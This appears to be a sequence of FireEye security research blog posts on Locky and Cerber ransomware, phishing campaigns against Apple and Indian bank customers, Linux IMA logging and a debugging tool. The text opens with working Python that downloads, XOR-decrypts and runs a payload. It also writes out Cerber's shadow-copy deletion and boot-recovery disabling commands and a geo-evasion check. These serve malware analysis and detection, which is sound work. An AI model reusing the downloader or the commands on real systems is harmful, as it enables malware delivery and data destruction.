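            encrypted = urllib.request.urlopen(url, timeout=10).read()
        except OSError:
            time.sleep(1.0)                        # step 2: sleep 1,000 ms on failure
            continue
        decrypted = bytes(b ^ XOR_KEY[i % len(XOR_KEY)]
                          for i, b in enumerate(encrypted))   # step 3: XOR decrypt
        if not (MIN_SIZE < len(decrypted) < MAX_SIZE):         # step 4: size check
            continue
        if decrypted[:2] != b"MZ":                             # step 5: MZ header check
            continue
        with open("payload.exe", "wb") as f:
            f.write(decrypted)
        subprocess.run(["payload.exe", "123"])                 # step 6: pass "123"
        break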

Locky Payload Updates

The Locky ransomware downloaded in this campaign requires a command line argument to properly execute. This command line parameter, “123” in the analyzed sample, is passed to the binary by the first stage JavaScript-based downloader and is used in the code unpacking stage of the ransomware. Legitimate binaries typically verify the number of arguments passed, or compare the command line parameter with the expected value, and gracefully exit if the check fails. However, in the case of this Locky ransomware, the program does not exit (Figure 6); instead, the value received as a command line parameter is added to a constant value defined in the binary. The sum of the constant and the parameter value is used in the decryption routine (Figure 7). If no command line parameter is passed, it adds zero to the constant.

Figure 6. Command line parameter check

Figure 7. Decryption routine

If no command line parameter is passed, the constant used by the decryption routine is incorrect. This results in a program crash, as the decrypted code is invalid. In Figure 8 and Figure 9, we can see the decrypted code sections with and without the command line parameter, respectively.

Figure 8. Correct decrypted code

Figure 9. Incorrect decrypted code

By using this technique, Locky authors have created a dependency on the first stage downloader for the second stage to be executed properly. If a second stage payload such as this is directly analyzed, it will result in a crash.
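The dependency can be modeled in a few lines of Python. This is a conceptual sketch of the mechanism described above, not Locky's actual routine; the constant, the stand-in bytes and the single-byte XOR are illustrative only.

EMBEDDED_CONSTANT = 0x55   # placeholder for the constant compiled into the binary

def unpack(blob, cli_arg=None):
    # The effective key is the embedded constant plus the numeric command line
    # argument; a missing argument contributes zero and yields the wrong key.
    key = (EMBEDDED_CONSTANT + (int(cli_arg) if cli_arg else 0)) & 0xFF
    return bytes(b ^ key for b in blob)

code = b"\x55\x8b\xec\x83\xec\x40"   # stand-in for valid unpacked code
packed = bytes(b ^ ((EMBEDDED_CONSTANT + 123) & 0xFF) for b in code)

assert unpack(packed, "123") == code   # correct argument: valid code
assert unpack(packed) != code          # missing argument: garbage, leading to a crash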

Conclusion

As of today, the Locky spam campaign is still ongoing, with an added anti-analysis / sandbox evasion technique. We expect to see additional Locky spam campaigns and will remain vigilant in order to protect our customers.

Email Hashes

2cdf62f8aae20026418f143895c769a2009e6b9b3ac59bfa8fc79ca2f326b93a

1fd5c1f0ecc1d54324f3bdc327e7893032482a13c0914ef6f531bd93caef0a06

0ea7d59d7f1494fce8f45a1f35abb07a456de6d8d65327eca8ff84f307a49a06

22645be8553628574a7af3c32a45178e201e9af33b20b36d29b9c012b731da4c

198d8d1a89221c575d957c1f4342741f3675ebb10f95ffe3371150e124f4850e

 

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

18 July 2016 at 12:00

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document, a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and was able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, startup.run and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case, we observed the macro code calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download and execute the ransomware without the victim’s knowledge.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.
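The effect of this churn on hash-based blocking is easy to demonstrate. The short Python illustration below is hypothetical; it simply shows that appending a few bytes changes the file hash even though the executable content is unchanged.

import hashlib
import os

payload = b"MZ" + b"\x90" * 1024        # stand-in for the served executable
for _ in range(3):
    variant = payload + os.urandom(8)    # freshly appended junk bytes
    print(hashlib.sha256(variant).hexdigest())
# Three different hashes are printed even though the executable portion of
# every variant is identical, so a blocklist keyed on file hashes lags behind.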

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\<GUID>), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder, then, after eliminating any blacklisted filenames from an internal list, it creates a renamed copy of itself in “%APPDATA%\<GUID>” using a pseudo-randomly selected name from the “system32” directory. The malware then executes the copy from the new location and cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplishes this by launching the following processes with the respective arguments (a detection sketch follows the command list):

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures"
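On the defensive side, these command lines are distinctive enough to alert on. Below is a minimal Python sketch of such a check; it is an illustration (not FireEye product logic) and assumes the third-party psutil package is installed.

import psutil

SUSPICIOUS_FRAGMENTS = (
    "delete shadows",                       # vssadmin.exe
    "shadowcopy delete",                    # wmic.exe
    "recoveryenabled no",                   # bcdedit.exe
    "bootstatuspolicy ignoreallfailures",   # bcdedit.exe
)

def find_suspicious_processes():
    # Scan running processes for the shadow-copy deletion and boot-policy
    # tampering commands listed above.
    hits = []
    for proc in psutil.process_iter(attrs=["pid", "name", "cmdline"]):
        cmdline = " ".join(proc.info["cmdline"] or []).lower()
        if any(fragment in cmdline for fragment in SUSPICIOUS_FRAGMENTS):
            hits.append((proc.info["pid"], proc.info["name"], cmdline))
    return hits

for pid, name, cmdline in find_suspicious_processes():
    print("[!] possible ransomware activity: pid=%d %s: %s" % (pid, name, cmdline))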

Coercion

People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.

 

 

Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages

Encryption

Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as .ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as ipinfo.io to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.
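The geo check can be approximated with a few lines of Python. This is a sketch of the behavior described above, not Cerber’s code: it queries ipinfo.io for the public IP’s country code and compares it against the ISO codes of the blacklisted countries; the exact service endpoint and JSON fields in the malware’s configuration may differ.

import json
import urllib.request

# ISO country codes for the blacklisted (protected) countries listed above.
BLACKLISTED_COUNTRIES = {
    "AM", "AZ", "BY", "GE", "KG", "KZ", "MD", "RU", "TM", "TJ", "UA", "UZ",
}

def host_is_blacklisted():
    with urllib.request.urlopen("https://ipinfo.io/json", timeout=10) as resp:
        country = json.load(resp).get("country", "")
    return country.upper() in BLACKLISTED_COUNTRIES

# Cerber-style logic: abort the infection when the host appears to be located
# in one of the protected countries.
if host_is_blacklisted():
    raise SystemExit(0)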

The attack also checked the system’s keyboard layout to further ensure it avoided infecting machines in the attackers’ geography: 1049—Russian, 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).
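The keyboard-layout check can likewise be approximated on Windows with ctypes. The sketch below is an illustration of the described behavior, not Cerber’s implementation: it enumerates the installed layouts with GetKeyboardLayoutList and compares the language identifier (the low word of each layout handle) against the LANGIDs listed above.

import ctypes

BLACKLISTED_LANGIDS = {
    1049, 1058, 1059, 1064, 1067, 1068, 1079, 1087, 1088, 1090, 1091,
    2072, 2073, 2092, 2115,
}

def has_blacklisted_layout():
    user32 = ctypes.windll.user32
    count = user32.GetKeyboardLayoutList(0, None)   # first call returns the count
    layouts = (ctypes.c_void_p * count)()
    user32.GetKeyboardLayoutList(count, layouts)
    for hkl in layouts:
        langid = (hkl or 0) & 0xFFFF                # low word of the HKL is the LANGID
        if langid in BLACKLISTED_LANGIDS:
            return True
    return False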

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.

Persistence

Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected (a registry audit sketch follows the list):

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as the Run and RunOnce registry keys are also used.
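For hunting, the registry locations that correspond to these mechanisms can be audited with a short, read-only script. The Python sketch below is illustrative and Windows-only; it checks the standard locations for the screensaver, command processor AutoRun, and Run/RunOnce mechanisms, so the exact values Cerber modifies may differ from what is listed here.

import winreg

CHECKS = [
    (winreg.HKEY_CURRENT_USER, r"Control Panel\Desktop", "SCRNSAVE.EXE"),
    (winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\Microsoft\Command Processor", "AutoRun"),
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\Run", None),
    (winreg.HKEY_CURRENT_USER, r"Software\Microsoft\Windows\CurrentVersion\RunOnce", None),
]

def dump_value(hive, path, name):
    try:
        with winreg.OpenKey(hive, path) as key:
            if name is not None:
                print(path, name, winreg.QueryValueEx(key, name)[0])
            else:
                index = 0
                while True:   # enumerate every value under Run/RunOnce
                    value_name, data, _ = winreg.EnumValue(key, index)
                    print(path, value_name, data)
                    index += 1
    except OSError:
        pass                  # key or value absent, or enumeration finished

# Values pointing at unexpected binaries under %APPDATA% warrant investigation.
for hive, path, name in CHECKS:
    dump_value(hive, path, name)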
A Solid Defense

Mitigating ransomware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections, or they may not be practical for your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.

Conclusion

Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots between the discrete individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has transpired or is transpiring. This can only be done if those professionals have the right tools and visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real time. At FireEye, we also go one step further and contact the relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Rotten Apples: Resurgence

20 October 2016 at 12:00

In June 2016, we published a blog about a phishing campaign targeting the Apple IDs and passwords of Chinese Apple users that emerged in the first quarter of 2016 (referred to as the “Zycode” phishing campaign). At FireEye Labs we have an automated system designed to proactively detect newly registered malicious domains and this system had observed some phishing domains that were designed to appear as legitimate Apple domains. Most of the domains reported by this system were suspended in June 2016, which resulted in a loss of momentum for the Zycode phishing campaign. Throughout the second quarter of 2016, the Zycode phishing campaign was in hibernation.

We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016. Once again, Chinese Apple users are being targeted for their Apple IDs and passwords using the same content reported on in our earlier blog. The majority of these domains are registered in the .com TLD by email accounts from qq[.]com, and the IPs of these domains point to mainland China, as seen in Figure 1.

Figure 1: Google map showing the location of the hosted phishing domains

What has not Changed?

The attackers have not changed the content of the phishing sites. The obfuscated JavaScript used in the earlier version is once again being used in this campaign. We provided the details of the JavaScript and screenshots of interaction with the website in our earlier blog.

What has Changed?

Apparently the domains and email addresses used in the previous version of the campaign were effectively taken down. The attackers have now moved to new malicious infrastructure; new domains, IPs and email addresses are being used for this campaign. The new domain names for the campaign are listed in Table 1, while their IPs and registrant emails are reported in Table 2 and Table 3, respectively.

Domains List

Table 1: Apple phishing domains serving the Zycode phishing kit.

Unique IP(s)

Table 2 shows the list of unique IPs, none of which overlap with those seen in the earlier campaign.

Table 2. IP addresses used by the domains.

Unique Email Addresses

The email addresses used to register these domains, showing no similarity with email addresses in the previous campaign, are shown in Table 3.

Table 3. List of unique registrant emails.

Unique Registrants

Table 4 shows the registrant names, which have no similarity with the previous registrant name information.

Table 4. List of registrant names used by the phishing domains.

How to Avoid Being a Victim

Apple provides information on phishing and on iCloud security on its support site. There are simple ways for a user to be more secure against this and similar attacks. The following are a few tips:

  • Enable two-factor authentication for Apple ID.
  • Always check the address bar for the correct web address.
  • Avoid clicking links in emails and SMS messages that supposedly direct to iCloud pages.
  • Use our FireEye EX appliance, which provides effective detection for the Zycode phishing campaign.

Extending Linux Executable Logging With The Integrity Measurement Architecture

9 November 2016 at 13:00

Gaining insight into the files being executed on your system is a great first step towards improved visibility on your endpoints. Taking this a step further, centrally storing logs of file execution data so they can be used for detection and hunting provides an excellent opportunity to find evil on your network.

A SIEM, and to some degree your entire security monitoring program, is only as good as the data you are collecting. Process execution data is incredibly valuable for enabling a multitude of detection and hunting scenarios, which means it’s something you should consider collecting and storing. Customers of our Threat Analytics Platform (TAP) cloud-based SIEM solution frequently ask us about tools that can help them collect this type of file execution data. For Windows systems, our detection team typically recommends the Sysinternals Sysmon tool since it provides excellent visibility into the type of files that are being executed on your Windows machines and both integrates and scales well when properly deployed.

In this post, I’m going to talk about a lesser-known feature of the Linux architecture called the Integrity Measurement Architecture (IMA). When coupled with auditd, IMA allows you to achieve executable logging on Linux hosts similar to what the Sysmon tool provides on Windows.

The Integrity Measurement Architecture is a component of the Linux kernel’s integrity subsystem. For this post, we’re going to focus on a minimum baseline configuration and policy in order to get file execution logs into a format that can be ingested by your SIEM. File execution logs are available in various forms and locations in Linux, but the logs we will be generating contain a wealth of data in one location that would otherwise need to be gathered from several disparate sources, or may not have been available at all.

First, you should familiarize yourself with documentation for your Linux distribution to verify whether the IMA kernel compilation options are enabled by default. The IMA subsystem has been part of the mainline kernel since version 2.6.30, but not every distribution compiles their kernel with these options enabled. All of the examples in this post were tested on Ubuntu 16.04.1 LTS, as the IMA kernel options are enabled by default in this distribution.

Instructions for compiling a kernel with these options enabled are listed in this Integrity Measurement Architecture documentation. Documentation for auditd can be found here. The reason we need the auditd daemon is because it is the userspace component for Linux’s auditing platform and it is responsible for writing all the resulting audit records to disk. Without auditd, the logs for the events we will be generating would never get written out to disk.

The stated goals of the IMA subsystem are “to detect if files have been accidentally or maliciously altered, both remotely and locally, appraise a file’s measurement against a ‘good’ value stored as an extended attribute, and enforce local file integrity.” To achieve these goals, IMA provides several functions, including:

  • Collect – “measure” a file before it is accessed. The term measurement in this context means to grab a hash of the file data, the hash of some file metadata and the file path, and then store this data in a runtime measurement list.
  • Store – add the measurement to a kernel resident list and, if a hardware Trusted Platform Module (TPM) is present, extend the IMA Platform Configuration Register (PCR). TPM and PCR are part of an international standard for dedicated microcontrollers intended to secure hardware.
  • Attest – if present, use the TPM to sign the IMA PCR value to allow a remote validation of the measurement list.
  • Appraise – enforce local validation of a measurement against a “good” value stored in an extended attribute of the file.
  • Protect – protect a file’s security extended attributes (including appraisal hash) against off-line attack.
Collect & Store

Part of the way the appraisal function validates a file is to calculate a hash value (essentially a fingerprint that is unique to the file’s contents) and compare this value against a stored “good” hash value. The specific hash function that IMA uses is a configurable option.

Attest

This is effective for locally ensuring integrity of an environment, but what if we also wanted to compare these measured hash values against a list of known bad file hashes through an external or internal blacklist? It could also be the case that runtime integrity checking on every machine isn’t suitable for your environment. Generating and storing these logs opens up the possibility for future investigation as well as centralized detection capabilities if your organization is ingesting these logs into a single repository.

Appraise

We can utilize the auditing function of IMA to generate a log every time IMA measures an executable. When an IMA policy is set to audit any executable and auditd is running, a log will be written containing metadata for each executable.

The simplest IMA policy we can write to log all executables looks like this:

audit func=BPRM_CHECK mask=MAY_EXEC

There are several ways to apply this policy to IMA, and they are detailed in the IMA documentation. Later versions of systemd will apply a custom policy located at “/etc/ima/ima-policy”. Placing the single-line policy set forth above in this file will cause systemd to apply this IMA policy to the system. A version of systemd with this capability is included in Ubuntu 16.04.1.

It should be noted that the example policy is extremely broad and will result in a high volume of logs being generated, primarily by daemons (the Linux equivalent of a Windows service) performing routine tasks, such as systemd. The policy can be further restricted by file magic values, UID, filesystem mask values and several others, as specified by the policy documentation.

This policy produces audit records of type INTEGRITY_RULE.

This gives us several great pieces of information for searching and correlation in a SIEM: the path of the file that was executed (kaiten.bin) and the path of its parent (/bin/bash), the PID (8205) and parent PID (1943) of the executable, the SHA-1 hash value (48a3171d8f04c09f6d06362d4c4b995eaa97d489) of this file (or whatever hash algorithm you configured IMA to use), and the UID, GID, etc., of the user that owned the process. A quick check in VirusTotal of the hash supplied to us by IMA in this example shows that this is a variant of the Kaiten IoT bot.
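Because auditd records are largely key=value pairs, turning them into structured events for a SIEM takes only a few lines. The Python sketch below is illustrative; the sample record is a reconstruction built from the values mentioned above, not a verbatim capture, and exact field names can vary between kernel and auditd versions.

import shlex

def parse_audit_record(line):
    # Split the record on whitespace (honoring quoted values like exe="...")
    # and build a dict from the key=value tokens.
    fields = {}
    for token in shlex.split(line):
        if "=" in token:
            key, _, value = token.partition("=")
            fields[key] = value
    return fields

# Illustrative INTEGRITY_RULE record assembled from the fields described above.
record = ('type=INTEGRITY_RULE msg=audit(1478696000.123:456): '
          'file="kaiten.bin" hash="48a3171d8f04c09f6d06362d4c4b995eaa97d489" '
          'ppid=1943 pid=8205 uid=1000 gid=1000 comm="bash" exe="/bin/bash"')
event = parse_audit_record(record)
print(event["file"], event["pid"], event["hash"])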

Once you are generating logs with IMA and auditd, you can send them to your SIEM using your normal log ingestion process via something like syslog.

Now that you’re ingesting these logs into your SIEM, there are all sorts of detection and hunting scenarios available (a minimal example of the path-based check follows the list):

  • Using rules and ingestion decoration services (services that add additional metadata to a log at ingestion time) to check hashes against internal and or external blacklists. For example:

            o   VirusTotal
            o   Lists of hashes seen in public Linux honeypots
            o   Lists of samples seen in previous incidents

  • Inspecting the path of the executable for abnormalities. For example:

            o   Binaries named as system utilities executing from unusual locations (/opt/app/sudo, /home/foo/su)
            o   Paths you wouldn’t expect to see with executable files (executables in your web app’s image upload directory)
            o   Binaries executing from hidden directories (/opt/.hidden/foo, /home/user/.hidden/bar)

  • Checking specific UIDs and GIDs for unusual execution. For example:

            o   Web app user account attempting to use unusual utilities (top, netstat, su, etc.)
            o   An account under an archive service group attempting to execute something out of /tmp

  • Checking specific parent executables and processes for unusual execution. For example:

            o   Communication broker executing directory traversal commands
            o   Apache process executing netcat

Configuration options for both IMA and auditd are extensive so, if this post is of interest to your organization, I highly recommend reading the documentation for both IMA and auditd so they can be further customized to your needs. This post isn’t meant to be an all-inclusive guide to IMA, but our hope is that it introduces you to this capability so that you can dive in and make it useful for improving your visibility into Linux process execution and aid you in finding more evil in your network.

‘One-Stop Shop’ – Phishing Domain Targets Information from Customers of Several Indian Banks

30 November 2016 at 17:13

FireEye Labs recently discovered a malicious phishing domain designed to steal a variety of information – including credentials and mobile numbers – from customers of several banks in India. Currently, we have not observed this domain being used in any campaigns. The phishing websites appear to be in the early stages of development, and through this post we hope users will be able to identify these types of emerging threats in the future.

FireEye phishing detection technology identified a newly registered domain, “csecurepay[.]com”, that was registered on Oct. 23, 2016. The website purports to offer online payment gateway services, but is actually a phishing website that leads to the capturing of victim logon credentials – and other information – for multiple banks operating in India.

Prior to publication, FireEye notified the Indian Computer Emergency Response Team.

Phishing Template Presentation and Techniques

Step 1

URL: hxxp://csecurepay[.]com/load-cash-step2.aspx

When navigating to the URL, the domain appears to be a payment gateway and requests that the user enter their bank account number and the amount to be transferred, as seen in Figure 1. The victim is allowed to choose their bank from a list that is provided.

Figure 1: Bank information being requested

By looking at the list, it is clear that only Indian banks are being targeted at this time. A total of 26 banks are available and these are named in the Appendix.

Step 2

URL:  hxxp://csecurepay[.]com/PaymentConfirmation.aspx

The next page requests that the victim enter a valid 10-digit mobile number and email ID (Figure 2), which makes the website appear more legitimate.

Figure 2: Personal information being requested

Step 3

The victim will then be redirected to the spoofed online banking page of the bank they selected, which requests that they log in using their user name and password. Figure 3 shows a fake login page for State Bank of India. See the Appendix for more banks that have spoofed login pages.

Figure 3: Fake login page for State Bank of India

After entering their login credentials, the victim will be asked to key in their One Time Password (OTP), as seen in Figure 4.

Figure 4: OTP being requested

Step 4

URL: hxxp://csecurepay[.]com/Final.aspx

Once all of the sensitive data is gathered, a fake failed login message will be displayed to the victim, as seen in Figure 5.

Figure 5: Fake error message being displayed

Credit and Debit Card Phishing Website

Using the registrant information from the csecurepay domain, we found another domain registered by the phisher: “nsecurepay[.]com”. The domain, registered in late August 2016, aims to steal credit and debit card information.

The following are among the list of cards that are targeted:

1.     ICICI Credit Card

2.     ICICI Debit Card

3.     Visa/Master Credit Card

4.     Visa/Master Debit Card

5.     SBI Debit Card Only

At the time of this writing, the nsecurepay website was producing errors when redirecting to spoofed credit and debit card pages. Figure 6 shows the front end.

Figure 6: Nsecurepay front end

Conclusion

Phishing has its own development lifecycle. It usually starts off with building the tools and developing the “hooks” for luring victims into providing their financial information. Once the phishing website (or websites) is fully operational, we typically begin to see a wave of phishing emails pointing to it.

In this case, we see that phishing websites have been crafted to spoof multiple banks in India. These attackers can potentially grab sensitive online banking information and other personal data, and have even built in support for capturing multifactor authentication and OTP codes. Moreover, disguising the initial presentation to appear as an online payment gateway service makes the phishing attack seem more legitimate.

FireEye Labs detects this phishing attack and customers will be protected against the usage of these sites in possible future campaigns.

Appendix

Fake login pages were served for 26 banks. The following is a list of some of the banks:

-Bank of Baroda - Corporate

-Bank of Baroda - Retail

-Bank of Maharashtra

-HDFC Bank

Figure 7: HDFC Bank fake login page

-ICICI Bank

-IDBI Bank

-Indian Bank

-IndusInd Bank

-Jammu and Kashmir Bank

-Kotak Bank

-Lakshmi Vilas Bank - Corporate

-Lakshmi Vilas Bank - Retail

-State Bank of Hyderabad

-State Bank of India

-State Bank of Jaipur

-State Bank of Mysore

-State Bank of Patiala

-State Bank of Bikaner

-State Bank of Travancore

-Tamilnad Mercantile Bank

-United Bank of India

FLARE Script Series: Querying Dynamic State using the FireEye Labs Query-Oriented Debugger (flare-qdb)

4 January 2017 at 14:02

Introduction

This post continues the FireEye Labs Advanced Reverse Engineering (FLARE) script series. Here, we introduce flare-qdb, a command-line utility and Python module based on vivisect for querying and altering dynamic binary state conveniently, iteratively, and at scale. flare-qdb works on Windows and Linux, and can be obtained from the flare-qdb github project.

Motivation

Efficiently understanding complex or obfuscated malware frequently entails debugging. Often, the linear process of following the program counter raises questions about parallel or previous register states, state changes within a loop, or whether an instruction will ever be executed at all. For example, a register’s value may not become interesting until the analyst learns it was an important input to a function that has already been executed. Restarting a debug session and cataloging the results can take the analyst out of the original thought process from which the question arose.

A malware analyst must constantly judge whether such inquiries will lend indispensable observations or extraneous distractions. The wrong decision wastes precious time. It would be useful to query malware state like a database, similar to the following:

SELECT eax, poi(ebp-0x14) FROM malware.exe WHERE eip = 0x401072

FLARE has devised a command-line tool to efficiently query dynamic state and more in a similar fashion. The following is a description of this tool with examples of how it has been used within FLARE to analyze malware, simulate new scenarios, and even solve challenges from the 2016 FLARE-On challenge.

Usage

Drawing heavily from vivisect, flare-qdb is an open source tool for efficiently posing sophisticated questions and obtaining simple answers from binaries. flare-qdb’s command-line syntax is as follows:

flareqdb "<cmdline>" -at <address> "<python>"

flare-qdb allows an analyst to execute a command line of their choosing, break on arbitrary program counter values, optionally check conditions, and display or alter program state with ad-hoc Python code. flare-qdb implements several WinDbg-like builtins for querying and modifying state. Table 1 lists a few illustrative example queries.

Experiment or Alteration

Query

What two DWORD arguments are passed to kernel32!Beep? (WinDbg analog: dd)

-at kernel32.Beep "dd('esp+4', 2)"

Terminate if eax is null at 0x401072 (WinDbg analog: .kill)

-at-if 0x401072 eax==0 "kill()"

Alter ecx programmatically (WinDbg analog: r)

-at malwaremodule+0x102a "r('ecx', '(ebp-0x14)*eax')"

Alter memory programmatically

-at 0x401003 "memset('ebp-0x14', 0x2a, 4)"

Table 1: Example flare-qdb queries

Using the flareqdb Command Line

The usefulness of flare-qdb can be seen in cases such as loops dealing with strings. Figure 1 shows the flareqdb command line utility being used to dump the Unicode string pointed to by a stack variable for each iteration of a loop. The output reveals that the variable is used as a runner pointer iterating through argv[1].

Figure 1: Using flareqdb to monitor a string within a loop

Another example is challenge 4 from the 2016 FLARE-On Challenge (spoiler alert: partial solution presented below, full walkthrough is here).

In flareon2016challenge.dll, a decoded PE file contains a series of calls to kernel32!Beep that must be tracked in order to construct the correct sequence of calls to ordinal #50 in the challenge binary. Figure 2 shows a flareqdb one-liner that forwards each kernel32!Beep call to ordinal #50 in the challenge binary to obtain the flag.

Figure 2: Using flareqdb to solve challenge 4 of the 2016 FLARE-On Challenge

flareqdb can also force branches to be taken, evaluate function pointer values, and validate suspected function addresses by disassembling. For example, consider the subroutine in Figure 3, which is only invoked if a set of conditions is satisfied and which calls a C++ virtual function. Identifying this function could help the analyst identify its caller and discover what kind of data to provide through the command and control (C2) channel to exercise it.

Figure 3: Unidentified function with virtual function call

Using the flareqdb command-line utility, it is possible to divert the program counter to bypass checks on the C2 data that was provided and subsequently dump the address of the function pointer that is called by the malware at program counter 0x4029a4. Thanks to vivisect, flare-qdb can even disassemble the instructions at the resulting address to validate that it is indeed a function. Figure 4 shows the flareqdb command-line utility being used to force control flow at 0x4016b5 to proceed to 0x4016bb (not shown) and later to dump the function pointer called at 0x4029a4.

Figure 4: Forcing a branch and resolving a C++ virtual function call

